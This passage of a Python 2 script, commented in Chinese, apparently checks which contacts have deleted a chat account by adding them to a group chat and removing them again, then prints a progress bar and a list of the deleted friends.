        if ChatRoomName == '':
            (ChatRoomName, DeletedList) = createChatroom(UserNames)
        else:
            DeletedList = addMember(ChatRoomName, UserNames)

        DeletedCount = len(DeletedList)
        if DeletedCount > 0:
            result += DeletedList

        # 删除成员
        deleteMember(ChatRoomName, UserNames)

        # 进度条
        progress_len = MAX_PROGRESS_LEN
        progress = '-' * progress_len
        progress_str = '%s' % ''.join(
            map(lambda x: '#', progress[:(progress_len *
                                          (i + 1)) / group_num]))
        print(''.join([
            '[', progress_str,
            ''.join('-' * (progress_len - len(progress_str))), ']'
        ]))
        print('新发现你被%d人删除' % DeletedCount)
        for i in range(DeletedCount):
            if d[DeletedList[i]][1] != '':
                print(d[DeletedList[i]][0] + '(%s)' % d[DeletedList[i]][1])
            else:
                print(d[DeletedList[i]][0])

        if i != group_num - 1:
            print('正在继续查找,请耐心等待...')
            # 下一次进行接口调用需要等待的时间
            time.sleep(INTERFACE_CALLING_INTERVAL)
    # todo 删除群组

    print('\n结果汇总完毕,20s后可重试...')
    resultNames = []
    for r in result:
        if d[r][1] != '':
            resultNames.append(d[r][0] + '(%s)' % d[r][1])
        else:
            resultNames.append(d[r][0])

    print('---------- 被删除的好友列表(共%d人) ----------' % len(result))
    # 过滤emoji
    resultNames = map(lambda x: re.sub(r'<span.+/span>', '', x), resultNames)
    if len(resultNames):
        print('\n'.join(resultNames))
    else:
        print("无")
    print('---------------------------------------------')